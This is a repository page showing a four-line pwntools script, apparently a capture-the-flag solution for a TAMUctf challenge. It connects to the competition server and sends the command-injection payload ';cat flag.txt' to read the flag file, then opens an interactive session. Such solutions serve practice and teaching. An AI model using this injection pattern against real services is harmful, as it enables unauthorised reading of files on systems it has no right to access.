This website works better with JavaScript.
Explore
Help
Register
Sign In
lyc
/
ctf
Watch
1
Star
0
Fork
You've already forked ctf
0
Code
Issues
Pull Requests
Releases
Wiki
Activity
You cannot select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
7728c15b1a
master
Branches
Tags
${ item.name }
Create tag
${ searchTerm }
Create branch
${ searchTerm }
from '7728c15b1a'
${ noResults }
ctf
/
tamu-writeup
/
pwn4wp.py
4 lines
103 B
Python
Raw
Blame
History
from
pwn
import
*
sh
=
remote
(
"
pwn.tamuctf.com
"
,
4324
)
sh
.
sendline
(
"
;cat flag.txt
"
)
sh
.
interactive
(
)
Reference in new issue
View Git Blame
Copy Permalink